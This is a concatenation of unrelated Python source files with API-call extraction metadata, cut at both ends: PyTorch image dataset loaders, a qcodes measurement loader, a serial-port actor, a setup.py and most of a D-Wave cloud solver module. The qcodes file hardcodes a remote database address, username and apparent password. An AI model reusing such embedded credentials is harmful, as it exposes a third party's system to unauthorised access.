'network.buses_t.v_ang.loc[[now]].T'], {'how': '"""left"""', 'left_on': 'b', 'right_index': '(True)'}), "(df, network.buses_t.v_ang.loc[[now]].T, how='left', left_on=b,\n right_index=True)\n", (12101, 12186), True, 'import pandas as pd\n'), ((8904, 8939), 'pandas.Series', 'pd.Series', (['(0.5)', 'network.lines.index'], {}), '(0.5, network.lines.index)\n', (8913, 8939), True, 'import pandas as pd\n'), ((4087, 4105), 'cartopy.crs.PlateCarree', 'ccrs.PlateCarree', ([], {}), '()\n', (4103, 4105), True, 'import cartopy.crs as ccrs\n'), ((4807, 4825), 'cartopy.crs.PlateCarree', 'ccrs.PlateCarree', ([], {}), '()\n', (4823, 4825), True, 'import cartopy.crs as ccrs\n'), ((8517, 8535), 'cartopy.crs.PlateCarree', 'ccrs.PlateCarree', ([], {}), '()\n', (8533, 8535), True, 'import cartopy.crs as ccrs\n'), ((8823, 8841), 'cartopy.crs.PlateCarree', 'ccrs.PlateCarree', ([], {}), '()\n', (8839, 8841), True, 'import cartopy.crs as ccrs\n'), ((12439, 12457), 'cartopy.crs.PlateCarree', 'ccrs.PlateCarree', ([], {}), '()\n', (12455, 12457), True, 'import cartopy.crs as ccrs\n')] |
import os
import glob
import numpy as np
import cv2
from PIL import Image, ImageFile
import torch
from torch.utils.data import Dataset
import torchvision.transforms as transforms
class BatchManagerTinyImageNet(Dataset):
def __init__(self, split='train',transform=None):
assert split in ['train', 'val']
self.transform = transform
self._base_dir = './tiny-imagenet-200/'
self._data_dir = os.path.join(self._base_dir, split)
# list of (image_path, class_idx, class_code)
self.image_paths_and_classes = []
if split == 'train':
self._class_codes = sorted([os.path.basename(class_dir) for class_dir in glob.glob(os.path.join(self._data_dir, '*'))])
for class_code in self._class_codes:
# class_image_paths = glob.glob(os.path.join(self._data_dir, class_code, '*/*'))
class_image_paths = os.path.join(self._data_dir, class_code+'/*')
class_image_paths = glob.glob(class_image_paths)
for class_image_path in class_image_paths:
if os.path.splitext(os.path.basename(class_image_path))[-1].lower() in ['.jpeg', '.jpg', '.png']:
self.image_paths_and_classes.append((class_image_path, class_code))
elif split == 'val':
self._class_codes = []
with open(os.path.join(self._data_dir, 'val_annotations.txt'), 'r') as f:
lines = f.readlines()
for line in lines:
line_tokens = line.strip().split("\t")
im_name, class_code = line_tokens[0], line_tokens[1]
self.image_paths_and_classes.append((os.path.join(self._data_dir, 'images', im_name), class_code))
self._class_codes.append(class_code)
self._class_codes = sorted(list(set(self._class_codes)))
def __getitem__(self, sample_idx):
image_path, class_code = self.image_paths_and_classes[sample_idx]
class_idx = self._class_codes.index(class_code)
image = Image.open(image_path).convert("RGB")
if self.transform:
image = self.transform(image)
# image = np.transpose(cv2.imread(image_path), axes=(2,0,1)).astype(np.float32)
return image, class_idx
def __len__(self):
return len(self.image_paths_and_classes) | [
"PIL.Image.open",
"os.path.join",
"os.path.basename",
"glob.glob"
] | [((424, 459), 'os.path.join', 'os.path.join', (['self._base_dir', 'split'], {}), '(self._base_dir, split)\n', (436, 459), False, 'import os\n'), ((901, 948), 'os.path.join', 'os.path.join', (['self._data_dir', "(class_code + '/*')"], {}), "(self._data_dir, class_code + '/*')\n", (913, 948), False, 'import os\n'), ((983, 1011), 'glob.glob', 'glob.glob', (['class_image_paths'], {}), '(class_image_paths)\n', (992, 1011), False, 'import glob\n'), ((2088, 2110), 'PIL.Image.open', 'Image.open', (['image_path'], {}), '(image_path)\n', (2098, 2110), False, 'from PIL import Image, ImageFile\n'), ((627, 654), 'os.path.basename', 'os.path.basename', (['class_dir'], {}), '(class_dir)\n', (643, 654), False, 'import os\n'), ((1388, 1439), 'os.path.join', 'os.path.join', (['self._data_dir', '"""val_annotations.txt"""'], {}), "(self._data_dir, 'val_annotations.txt')\n", (1400, 1439), False, 'import os\n'), ((682, 715), 'os.path.join', 'os.path.join', (['self._data_dir', '"""*"""'], {}), "(self._data_dir, '*')\n", (694, 715), False, 'import os\n'), ((1714, 1761), 'os.path.join', 'os.path.join', (['self._data_dir', '"""images"""', 'im_name'], {}), "(self._data_dir, 'images', im_name)\n", (1726, 1761), False, 'import os\n'), ((1111, 1145), 'os.path.basename', 'os.path.basename', (['class_image_path'], {}), '(class_image_path)\n', (1127, 1145), False, 'import os\n')] |
"""Implements COVID Img Slic sDataset"""
import os
import pandas as pd
import torch
from PIL import Image
from torch.utils.data import Dataset
from torchvision import transforms
from src.modules.transforms import *
from src.utils.mapper import configmapper
@configmapper.map("datasets", "covid_img_slic")
class CovidImgSlic(Dataset):
def __init__(self, config):
super().__init__()
self.config = config
graph_transformations = []
for transform in config.graph_transform_args:
param_dict = (
dict(transform["params"]) if transform["params"] is not None else {}
)
graph_transformations.append(
configmapper.get_object("transforms", transform["type"])(**param_dict)
)
self.graph_transform = (
transforms.Compose(graph_transformations)
if graph_transformations != []
else None
)
image_transformations = []
for transform in config.image_transform_args:
param_dict = (
dict(transform["params"]) if transform["params"] is not None else {}
)
image_transformations.append(
configmapper.get_object("transforms", transform["type"])(**param_dict)
)
self.image_transform = (
transforms.Compose(image_transformations)
if image_transformations != []
else None
)
self.data_paths_df = pd.read_csv(config.data_paths_csv)
self.data_paths_df["path"] = self.data_paths_df["path"].apply(
lambda x: os.path.join("/".join(config.data_paths_csv.split("/")[:-1]), x)
)
def __len__(self):
return self.data_paths_df.shape[0]
def __getitem__(self, idx):
image = Image.open(self.data_paths_df.iloc[idx]["path"]).convert("L")
label = self.data_paths_df.iloc[idx]["label"]
if self.graph_transform is not None:
graph = self.graph_transform(image)
if self.image_transform is not None:
image = self.image_transform(image)
return {
"graph": graph,
"image": image,
"label": torch.tensor(label, dtype=torch.long),
}
| [
"PIL.Image.open",
"pandas.read_csv",
"src.utils.mapper.configmapper.map",
"torch.tensor",
"torchvision.transforms.Compose",
"src.utils.mapper.configmapper.get_object"
] | [((263, 309), 'src.utils.mapper.configmapper.map', 'configmapper.map', (['"""datasets"""', '"""covid_img_slic"""'], {}), "('datasets', 'covid_img_slic')\n", (279, 309), False, 'from src.utils.mapper import configmapper\n'), ((1499, 1533), 'pandas.read_csv', 'pd.read_csv', (['config.data_paths_csv'], {}), '(config.data_paths_csv)\n', (1510, 1533), True, 'import pandas as pd\n'), ((831, 872), 'torchvision.transforms.Compose', 'transforms.Compose', (['graph_transformations'], {}), '(graph_transformations)\n', (849, 872), False, 'from torchvision import transforms\n'), ((1352, 1393), 'torchvision.transforms.Compose', 'transforms.Compose', (['image_transformations'], {}), '(image_transformations)\n', (1370, 1393), False, 'from torchvision import transforms\n'), ((2216, 2253), 'torch.tensor', 'torch.tensor', (['label'], {'dtype': 'torch.long'}), '(label, dtype=torch.long)\n', (2228, 2253), False, 'import torch\n'), ((1818, 1866), 'PIL.Image.open', 'Image.open', (["self.data_paths_df.iloc[idx]['path']"], {}), "(self.data_paths_df.iloc[idx]['path'])\n", (1828, 1866), False, 'from PIL import Image\n'), ((701, 757), 'src.utils.mapper.configmapper.get_object', 'configmapper.get_object', (['"""transforms"""', "transform['type']"], {}), "('transforms', transform['type'])\n", (724, 757), False, 'from src.utils.mapper import configmapper\n'), ((1222, 1278), 'src.utils.mapper.configmapper.get_object', 'configmapper.get_object', (['"""transforms"""', "transform['type']"], {}), "('transforms', transform['type'])\n", (1245, 1278), False, 'from src.utils.mapper import configmapper\n')] |
import logging
from core_tools.data.ds.data_set_core import data_set
from core_tools.data.ds.data_set_raw import data_set_raw
from core_tools.data.SQL.SQL_dataset_creator import SQL_dataset_creator
import json
import qcodes as qc
def load_by_id(exp_id):
'''
load a dataset by specifying its id (search in local db)
args:
exp_id (int) : id of the experiment you want to load
'''
SQL_mgr = SQL_dataset_creator()
return data_set(SQL_mgr.fetch_raw_dataset_by_Id(exp_id))
def load_by_uuid(exp_uuid, copy2localdb=False):
'''
load a dataset by specifying its uuid (searches in local and remote db)
args:
exp_uuid (int) : uuid of the experiment you want to load
copy2localdb (bool): copy measurement to local database if only in remote
'''
SQL_mgr = SQL_dataset_creator()
return data_set(SQL_mgr.fetch_raw_dataset_by_UUID(exp_uuid, copy2localdb))
def create_new_data_set(experiment_name, measurement_snapshot, *m_params):
'''
generates a dataclass for a given set of measurement parameters
Args:
experiment_name (str) : name of experiment
measurement_snapshot (dict[str,Any]) : snapshot of measurement parameters
*m_params (m_param_dataset) : datasets of the measurement parameters
'''
ds = data_set_raw(exp_name=experiment_name)
if qc.Station.default is not None:
station_snapshot = qc.Station.default.snapshot()
snapshot = {'station': station_snapshot}
else:
logging.error('No station configured')
snapshot = {'station': None}
# intialize the buffers for the measurement
for m_param in m_params:
m_param.init_data_dataclass()
ds.measurement_parameters += [m_param]
ds.measurement_parameters_raw += m_param.to_SQL_data_structure()
snapshot['measurement'] = measurement_snapshot
# encode and decode to convert all numpy arrays and complex numbers to jsonable lists and dictionaries
snapshot_json = json.dumps(snapshot, cls=qc.utils.helpers.NumpyJSONEncoder)
snapshot = json.loads(snapshot_json)
ds.snapshot = snapshot
SQL_mgr = SQL_dataset_creator()
SQL_mgr.register_measurement(ds)
return data_set(ds)
if __name__ == '__main__':
from core_tools.data.SQL.connect import set_up_local_storage,set_up_remote_storage
set_up_remote_storage('172.16.31.10', 5432, 'xld_measurement_pc', 'XLDspin001', 'spin_data', "6dot", "XLD", "6D3S - SQ20-20-5-18-4")
ds= (load_by_id(23000))
print(ds.snapshot['station']['instruments']['gates']['parameters'].keys())
for key in ds.snapshot['station']['instruments']['gates']['parameters'].keys():
print(key, ds.snapshot['station']['instruments']['gates']['parameters'][key]['value'])
# print(ds.metadata)
# print(ds.m1.z())
# print(ds.m1.x())
# print(ds.m1.y()) | [
"core_tools.data.SQL.SQL_dataset_creator.SQL_dataset_creator",
"json.loads",
"core_tools.data.SQL.connect.set_up_remote_storage",
"json.dumps",
"core_tools.data.ds.data_set_core.data_set",
"qcodes.Station.default.snapshot",
"logging.error",
"core_tools.data.ds.data_set_raw.data_set_raw"
] | [((419, 440), 'core_tools.data.SQL.SQL_dataset_creator.SQL_dataset_creator', 'SQL_dataset_creator', ([], {}), '()\n', (438, 440), False, 'from core_tools.data.SQL.SQL_dataset_creator import SQL_dataset_creator\n'), ((815, 836), 'core_tools.data.SQL.SQL_dataset_creator.SQL_dataset_creator', 'SQL_dataset_creator', ([], {}), '()\n', (834, 836), False, 'from core_tools.data.SQL.SQL_dataset_creator import SQL_dataset_creator\n'), ((1306, 1344), 'core_tools.data.ds.data_set_raw.data_set_raw', 'data_set_raw', ([], {'exp_name': 'experiment_name'}), '(exp_name=experiment_name)\n', (1318, 1344), False, 'from core_tools.data.ds.data_set_raw import data_set_raw\n'), ((2001, 2060), 'json.dumps', 'json.dumps', (['snapshot'], {'cls': 'qc.utils.helpers.NumpyJSONEncoder'}), '(snapshot, cls=qc.utils.helpers.NumpyJSONEncoder)\n', (2011, 2060), False, 'import json\n'), ((2076, 2101), 'json.loads', 'json.loads', (['snapshot_json'], {}), '(snapshot_json)\n', (2086, 2101), False, 'import json\n'), ((2145, 2166), 'core_tools.data.SQL.SQL_dataset_creator.SQL_dataset_creator', 'SQL_dataset_creator', ([], {}), '()\n', (2164, 2166), False, 'from core_tools.data.SQL.SQL_dataset_creator import SQL_dataset_creator\n'), ((2216, 2228), 'core_tools.data.ds.data_set_core.data_set', 'data_set', (['ds'], {}), '(ds)\n', (2224, 2228), False, 'from core_tools.data.ds.data_set_core import data_set\n'), ((2349, 2485), 'core_tools.data.SQL.connect.set_up_remote_storage', 'set_up_remote_storage', (['"""172.16.31.10"""', '(5432)', '"""xld_measurement_pc"""', '"""XLDspin001"""', '"""spin_data"""', '"""6dot"""', '"""XLD"""', '"""6D3S - SQ20-20-5-18-4"""'], {}), "('172.16.31.10', 5432, 'xld_measurement_pc',\n 'XLDspin001', 'spin_data', '6dot', 'XLD', '6D3S - SQ20-20-5-18-4')\n", (2370, 2485), False, 'from core_tools.data.SQL.connect import set_up_local_storage, set_up_remote_storage\n'), ((1412, 1441), 'qcodes.Station.default.snapshot', 'qc.Station.default.snapshot', ([], {}), '()\n', (1439, 1441), True, 'import qcodes as qc\n'), ((1509, 1547), 'logging.error', 'logging.error', (['"""No station configured"""'], {}), "('No station configured')\n", (1522, 1547), False, 'import logging\n')] |
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from calvin.actor.actor import Actor, ActionResult, manage, condition, guard
from calvin.utilities.calvinlogger import get_logger
from calvin.runtime.north.calvin_token import ExceptionToken
from serial import PARITY_NONE, STOPBITS_ONE, EIGHTBITS
_log = get_logger(__name__)
class SerialPort(Actor):
"""
Read/write data from serial port.
inputs:
in : Tokens to write.
Outputs:
out : Tokens read.
"""
@manage(['devicename', 'baudrate', 'bytesize', 'parity', 'stopbits', 'timeout', 'xonxoff', 'rtscts'])
def init(self, devicename, baudrate, bytesize=EIGHTBITS, parity=PARITY_NONE, stopbits=STOPBITS_ONE, timeout=0, xonxoff=0, rtscts=0):
self.not_found = False
self.devicename = devicename
self.baudrate = baudrate
try:
self.device = self.calvinsys.io.serialport.open(
devicename,
baudrate,
bytesize,
parity,
stopbits,
timeout,
xonxoff,
rtscts)
except:
self.device = None
self.not_found = True
@condition([], ['out'])
@guard(lambda self: self.not_found)
def device_not_found(self):
token = ExceptionToken(value="Device not found")
self.not_found = False # Only report once
return ActionResult(production=(token, ))
@condition([], ['out'])
@guard(lambda self: self.device and self.device.has_data())
def read(self):
data = self.device.read()
return ActionResult(production=(data, ))
@condition(action_input=['in'])
@guard(lambda self, _: self.device)
def write(self, data):
self.device.write(str(data))
return ActionResult(production=())
action_priority = (device_not_found, read, write)
| [
"calvin.actor.actor.condition",
"calvin.actor.actor.guard",
"calvin.actor.actor.manage",
"calvin.actor.actor.ActionResult",
"calvin.utilities.calvinlogger.get_logger",
"calvin.runtime.north.calvin_token.ExceptionToken"
] | [((860, 880), 'calvin.utilities.calvinlogger.get_logger', 'get_logger', (['__name__'], {}), '(__name__)\n', (870, 880), False, 'from calvin.utilities.calvinlogger import get_logger\n'), ((1049, 1153), 'calvin.actor.actor.manage', 'manage', (["['devicename', 'baudrate', 'bytesize', 'parity', 'stopbits', 'timeout',\n 'xonxoff', 'rtscts']"], {}), "(['devicename', 'baudrate', 'bytesize', 'parity', 'stopbits',\n 'timeout', 'xonxoff', 'rtscts'])\n", (1055, 1153), False, 'from calvin.actor.actor import Actor, ActionResult, manage, condition, guard\n'), ((1753, 1775), 'calvin.actor.actor.condition', 'condition', (['[]', "['out']"], {}), "([], ['out'])\n", (1762, 1775), False, 'from calvin.actor.actor import Actor, ActionResult, manage, condition, guard\n'), ((1781, 1815), 'calvin.actor.actor.guard', 'guard', (['(lambda self: self.not_found)'], {}), '(lambda self: self.not_found)\n', (1786, 1815), False, 'from calvin.actor.actor import Actor, ActionResult, manage, condition, guard\n'), ((2012, 2034), 'calvin.actor.actor.condition', 'condition', (['[]', "['out']"], {}), "([], ['out'])\n", (2021, 2034), False, 'from calvin.actor.actor import Actor, ActionResult, manage, condition, guard\n'), ((2208, 2238), 'calvin.actor.actor.condition', 'condition', ([], {'action_input': "['in']"}), "(action_input=['in'])\n", (2217, 2238), False, 'from calvin.actor.actor import Actor, ActionResult, manage, condition, guard\n'), ((2244, 2278), 'calvin.actor.actor.guard', 'guard', (['(lambda self, _: self.device)'], {}), '(lambda self, _: self.device)\n', (2249, 2278), False, 'from calvin.actor.actor import Actor, ActionResult, manage, condition, guard\n'), ((1864, 1904), 'calvin.runtime.north.calvin_token.ExceptionToken', 'ExceptionToken', ([], {'value': '"""Device not found"""'}), "(value='Device not found')\n", (1878, 1904), False, 'from calvin.runtime.north.calvin_token import ExceptionToken\n'), ((1971, 2004), 'calvin.actor.actor.ActionResult', 'ActionResult', ([], {'production': '(token,)'}), '(production=(token,))\n', (1983, 2004), False, 'from calvin.actor.actor import Actor, ActionResult, manage, condition, guard\n'), ((2168, 2200), 'calvin.actor.actor.ActionResult', 'ActionResult', ([], {'production': '(data,)'}), '(production=(data,))\n', (2180, 2200), False, 'from calvin.actor.actor import Actor, ActionResult, manage, condition, guard\n'), ((2358, 2385), 'calvin.actor.actor.ActionResult', 'ActionResult', ([], {'production': '()'}), '(production=())\n', (2370, 2385), False, 'from calvin.actor.actor import Actor, ActionResult, manage, condition, guard\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name='asciitree',
version='0.3.4.dev1',
description='Draws ASCII trees.',
long_description=read('README.rst'),
author='<NAME>',
author_email='<EMAIL>',
url='http://github.com/mbr/asciitree',
license='MIT',
packages=find_packages(exclude=['tests']),
install_requires=[],
)
| [
"os.path.dirname",
"setuptools.find_packages"
] | [((452, 484), 'setuptools.find_packages', 'find_packages', ([], {'exclude': "['tests']"}), "(exclude=['tests'])\n", (465, 484), False, 'from setuptools import setup, find_packages\n'), ((150, 175), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (165, 175), False, 'import os\n')] |
# Copyright 2017 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
A :term:`solver` is a resource for solving problems.
Solvers are responsible for:
- Encoding submitted problems
- Checking submitted parameters
- Decoding answers
- Adding problems to a client's submission queue
You can list all solvers available to a :class:`~dwave.cloud.client.Client` with its
:func:`~dwave.cloud.client.Client.get_solvers` method and select and return one with its
:func:`~dwave.cloud.client.Client.get_solver` method.
"""
from __future__ import division, absolute_import
import json
import logging
import warnings
from collections import Mapping
from dwave.cloud.exceptions import *
from dwave.cloud.coders import (
encode_problem_as_qp, encode_problem_as_bq,
decode_qp_numpy, decode_qp, decode_bq)
from dwave.cloud.utils import uniform_iterator, reformat_qubo_as_ising
from dwave.cloud.computation import Future
# Use numpy if available for fast encoding/decoding
try:
import numpy as np
_numpy = True
except ImportError:
_numpy = False
__all__ = ['Solver', 'BaseSolver', 'StructuredSolver', 'UnstructuredSolver']
logger = logging.getLogger(__name__)
class BaseSolver(object):
"""Base class for a general D-Wave solver.
This class provides :term:`Ising`, :term:`QUBO` and :term:`BQM` sampling
methods and encapsulates the solver description returned from the D-Wave
cloud API.
Args:
client (:class:`Client`):
Client that manages access to this solver.
data (`dict`):
Data from the server describing this solver.
Examples:
This example creates a client using the local system's default D-Wave Cloud
Client configuration file and checks the identity of its default solver.
>>> from dwave.cloud import Client
>>> with Client.from_config() as client:
... solver = client.get_solver()
... solver.id # doctest: +SKIP
'EXAMPLE_2000Q_SYSTEM'
"""
# Classes of problems the remote solver has to support (at least one of these)
# in order for `Solver` to be able to abstract, or use, that solver
_handled_problem_types = {}
_handled_encoding_formats = {}
def __init__(self, client, data):
# client handles async api requests (via local thread pool)
self.client = client
# data for each solver includes at least: id, description, properties,
# status and avg_load
self.data = data
# Each solver has an ID field
try:
self.id = data['id']
except KeyError:
raise InvalidAPIResponseError("Missing solver property: 'id'")
# Properties of this solver the server presents: dict
try:
self.properties = data['properties']
except KeyError:
raise SolverPropertyMissingError("Missing solver property: 'properties'")
# The set of extra parameters this solver will accept in sample_ising or sample_qubo: dict
self.parameters = self.properties.get('parameters', {})
# Ensure this remote solver supports at least one of the problem types we know how to handle
try:
self.supported_problem_types = set(self.properties['supported_problem_types'])
except KeyError:
raise SolverPropertyMissingError(
"Missing solver property: 'properties.supported_problem_types'")
if self.supported_problem_types.isdisjoint(self._handled_problem_types):
raise UnsupportedSolverError(
("Remote solver {id!r} supports {supports} problems, "
"but {cls!r} class of solvers handles only {handled}").format(
id=self.id,
supports=list(self.supported_problem_types),
cls=type(self).__name__,
handled=list(self._handled_problem_types)))
# When True the solution data will be returned as numpy matrices: False
# TODO: deprecate
self.return_matrix = False
# Derived solver properties (not present in solver data properties dict)
self.derived_properties = {
'qpu', 'software', 'online', 'avg_load', 'name'
}
def __repr__(self):
return "{}(id={!r})".format(type(self).__name__, self.id)
def _retrieve_problem(self, id_):
"""Resume polling for a problem previously submitted.
Args:
id_: Identification of the query.
Returns:
:obj: `Future`
"""
future = Future(self, id_, self.return_matrix)
self.client._poll(future)
return future
def check_problem(self, *args, **kwargs):
return True
def _decode_qp(self, msg):
if _numpy:
return decode_qp_numpy(msg, return_matrix=self.return_matrix)
else:
return decode_qp(msg)
def decode_response(self, msg):
if msg['type'] not in self._handled_problem_types:
raise ValueError('Unknown problem type received.')
fmt = msg.get('answer', {}).get('format')
if fmt not in self._handled_encoding_formats:
raise ValueError('Unhandled answer encoding format received.')
if fmt == 'qp':
return self._decode_qp(msg)
elif fmt == 'bq':
return decode_bq(msg)
else:
raise ValueError("Don't know how to decode %r answer format" % fmt)
# Sampling methods
def sample_ising(self, linear, quadratic, **params):
raise NotImplementedError
def sample_qubo(self, qubo, **params):
raise NotImplementedError
def sample_bqm(self, bqm, **params):
raise NotImplementedError
def upload_bqm(self, bqm):
raise NotImplementedError
# Derived properties
@property
def name(self):
return self.id
@property
def online(self):
"Is this solver online (or offline)?"
return self.data.get('status', 'online').lower() == 'online'
@property
def avg_load(self):
"Solver's average load, at the time of description fetch."
return self.data.get('avg_load')
@property
def qpu(self):
"Is this a QPU-based solver?"
# TODO: add a field for this in SAPI response; for now base decision on id/name
return not self.id.startswith('c4-sw_')
@property
def software(self):
"Is this a software-based solver?"
# TODO: add a field for this in SAPI response; for now base decision on id/name
return self.id.startswith('c4-sw_')
@property
def is_qpu(self):
warnings.warn("'is_qpu' property is deprecated in favor of 'qpu'.", DeprecationWarning)
return self.qpu
@property
def is_software(self):
warnings.warn("'is_software' property is deprecated in favor of 'software'.", DeprecationWarning)
return self.software
@property
def is_online(self):
warnings.warn("'is_online' property is deprecated in favor of 'online'.", DeprecationWarning)
return self.online
class UnstructuredSolver(BaseSolver):
"""Class for D-Wave unstructured solvers.
This class provides :term:`Ising`, :term:`QUBO` and :term:`BQM` sampling
methods and encapsulates the solver description returned from the D-Wave
cloud API.
Args:
client (:class:`~dwave.cloud.client.Client`):
Client that manages access to this solver.
data (`dict`):
Data from the server describing this solver.
"""
_handled_problem_types = {"bqm"}
_handled_encoding_formats = {"bq"}
def sample_ising(self, linear, quadratic, **params):
"""Sample from the specified :term:`BQM`.
Args:
bqm (:class:`~dimod.BinaryQuadraticModel`):
A binary quadratic model.
**params:
Parameters for the sampling method, solver-specific.
Returns:
:class:`Future`
Note:
To use this method, dimod package has to be installed.
"""
try:
import dimod
except ImportError: # pragma: no cover
raise RuntimeError("Can't use solver of type 'bqm' without dimod. "
"Re-install the library with 'bqm' support.")
bqm = dimod.BinaryQuadraticModel.from_ising(linear, quadratic)
return self.sample_bqm(bqm, **params)
def sample_qubo(self, qubo, **params):
"""Sample from the specified :term:`QUBO`.
Args:
qubo (dict[(int, int), float]):
Coefficients of a quadratic unconstrained binary optimization
(QUBO) model.
**params:
Parameters for the sampling method, solver-specific.
Returns:
:class:`Future`
Note:
To use this method, dimod package has to be installed.
"""
try:
import dimod
except ImportError: # pragma: no cover
raise RuntimeError("Can't use solver of type 'bqm' without dimod. "
"Re-install the library with 'bqm' support.")
bqm = dimod.BinaryQuadraticModel.from_qubo(qubo)
return self.sample_bqm(bqm, **params)
def sample_bqm(self, bqm, **params):
"""Sample from the specified :term:`BQM`.
Args:
bqm (:class:`~dimod.BinaryQuadraticModel`/str):
A binary quadratic model, or a reference to one
(Problem ID returned by `.upload_bqm` method).
**params:
Parameters for the sampling method, solver-specific.
Returns:
:class:`~dwave.cloud.computation.Future`
Note:
To use this method, dimod package has to be installed.
"""
# encode the request
body = json.dumps({
'solver': self.id,
'data': encode_problem_as_bq(bqm),
'type': 'bqm',
'params': params
})
logger.trace("Encoded sample request: %s", body)
future = Future(solver=self, id_=None, return_matrix=self.return_matrix)
logger.debug("Submitting new problem to: %s", self.id)
self.client._submit(body, future)
return future
def upload_bqm(self, bqm):
"""Upload the specified :term:`BQM` to SAPI, returning a Problem ID
that can be used to submit the BQM to this solver (i.e. call the
`.sample_bqm` method).
Args:
bqm (:class:`~dimod.BinaryQuadraticModel`/bytes-like/file-like):
A binary quadratic model given either as an in-memory
:class:`~dimod.BinaryQuadraticModel` object, or as raw data
(encoded serialized model) in either a file-like or a bytes-like
object.
Returns:
:class:`concurrent.futures.Future`[str]:
Problem ID in a Future. Problem ID can be used to submit
problems by reference.
Note:
To use this method, dimod package has to be installed.
"""
if hasattr(bqm, 'to_serializable'):
data = encode_problem_as_bq(bqm, compress=True)['data']
else:
# raw data (ready for upload) in `bqm`
data = bqm
return self.client.upload_problem_encoded(data)
class StructuredSolver(BaseSolver):
"""Class for D-Wave structured solvers.
This class provides :term:`Ising`, :term:`QUBO` and :term:`BQM` sampling
methods and encapsulates the solver description returned from the D-Wave
cloud API.
Args:
client (:class:`~dwave.cloud.client.Client`):
Client that manages access to this solver.
data (`dict`):
Data from the server describing this solver.
"""
_handled_problem_types = {"ising", "qubo"}
_handled_encoding_formats = {"qp"}
def __init__(self, *args, **kwargs):
super(StructuredSolver, self).__init__(*args, **kwargs)
# The exact sequence of nodes/edges is used in encoding problems and must be preserved
try:
self._encoding_qubits = self.properties['qubits']
except KeyError:
raise SolverPropertyMissingError("Missing solver property: 'properties.qubits'")
try:
self._encoding_couplers = [tuple(edge) for edge in self.properties['couplers']]
except KeyError:
raise SolverPropertyMissingError("Missing solver property: 'properties.couplers'")
# The nodes in this solver's graph: set(int)
self.nodes = self.variables = set(self._encoding_qubits)
# The edges in this solver's graph, every edge will be present as (a, b) and (b, a): set(tuple(int, int))
self.edges = self.couplers = set(tuple(edge) for edge in self._encoding_couplers) | \
set((edge[1], edge[0]) for edge in self._encoding_couplers)
# The edges in this solver's graph, each edge will only be represented once: set(tuple(int, int))
self.undirected_edges = {edge for edge in self.edges if edge[0] < edge[1]}
# Create a set of default parameters for the queries
self._params = {}
# Add derived properties specific for this solver
self.derived_properties.update({'lower_noise', 'num_active_qubits'})
# Derived properties
@property
def num_active_qubits(self):
"The number of active (encoding) qubits."
return len(self.nodes)
@property
def is_vfyc(self):
"Is this a virtual full-yield chip?"
return self.properties.get('vfyc') == True
@property
def has_flux_biases(self):
"Solver supports/accepts ``flux_biases``."
return 'flux_biases' in self.parameters
@property
def has_anneal_schedule(self):
"Solver supports/accepts ``anneal_schedule``."
return 'anneal_schedule' in self.parameters
@property
def num_qubits(self):
"Nominal number of qubits on chip (includes active AND inactive)."
return self.properties.get('num_qubits')
@property
def lower_noise(self):
return "lower_noise" in self.properties.get("tags", [])
def max_num_reads(self, **params):
"""Returns the maximum number of reads for the given solver parameters.
Args:
**params:
Parameters for the sampling method. Relevant to num_reads:
- annealing_time
- readout_thermalization
- num_reads
- programming_thermalization
Returns:
int: The maximum number of reads.
"""
# dev note: in the future it would be good to have a way of doing this
# server-side, as we are duplicating logic here.
properties = self.properties
if self.software or not params:
# software solvers don't use any of the above parameters
return properties['num_reads_range'][1]
# qpu
_, duration = properties['problem_run_duration_range']
annealing_time = params.get('annealing_time',
properties['default_annealing_time'])
readout_thermalization = params.get('readout_thermalization',
properties['default_readout_thermalization'])
programming_thermalization = params.get('programming_thermalization',
properties['default_programming_thermalization'])
return min(properties['num_reads_range'][1],
int((duration - programming_thermalization)
/ (annealing_time + readout_thermalization)))
# Sampling methods
def sample_ising(self, linear, quadratic, **params):
"""Sample from the specified :term:`Ising` model.
Args:
linear (list/dict):
Linear terms of the model (h).
quadratic (dict[(int, int), float]):
Quadratic terms of the model (J), stored in a dict. With keys
that are 2-tuples of variables and values are quadratic biases
associated with the pair of variables (the interaction).
**params:
Parameters for the sampling method, solver-specific.
Returns:
:class:`Future`
Examples:
This example creates a client using the local system's default D-Wave Cloud Client
configuration file, which is configured to access a D-Wave 2000Q QPU, submits a
simple :term:`Ising` problem (opposite linear biases on two coupled qubits), and samples
5 times.
>>> from dwave.cloud import Client
>>> with Client.from_config() as client:
... solver = client.get_solver()
... u, v = next(iter(solver.edges))
... computation = solver.sample_ising({u: -1, v: 1}, {}, num_reads=5) # doctest: +SKIP
... for i in range(5):
... print(computation.samples[i][u], computation.samples[i][v])
...
...
(1, -1)
(1, -1)
(1, -1)
(1, -1)
(1, -1)
"""
# Our linear and quadratic objective terms are already separated in an
# ising model so we can just directly call `_sample`.
return self._sample('ising', linear, quadratic, params)
def sample_qubo(self, qubo, **params):
"""Sample from the specified :term:`QUBO`.
Args:
qubo (dict[(int, int), float]):
Coefficients of a quadratic unconstrained binary optimization
(QUBO) model.
**params:
Parameters for the sampling method, solver-specific.
Returns:
:class:`Future`
Examples:
This example creates a client using the local system's default D-Wave Cloud Client
configuration file, which is configured to access a D-Wave 2000Q QPU, submits
a :term:`QUBO` problem (a Boolean NOT gate represented by a penalty model), and
samples 5 times.
>>> from dwave.cloud import Client
>>> with Client.from_config() as client: # doctest: +SKIP
... solver = client.get_solver()
... u, v = next(iter(solver.edges))
... Q = {(u, u): -1, (u, v): 0, (v, u): 2, (v, v): -1}
... computation = solver.sample_qubo(Q, num_reads=5)
... for i in range(5):
... print(computation.samples[i][u], computation.samples[i][v])
...
...
(0, 1)
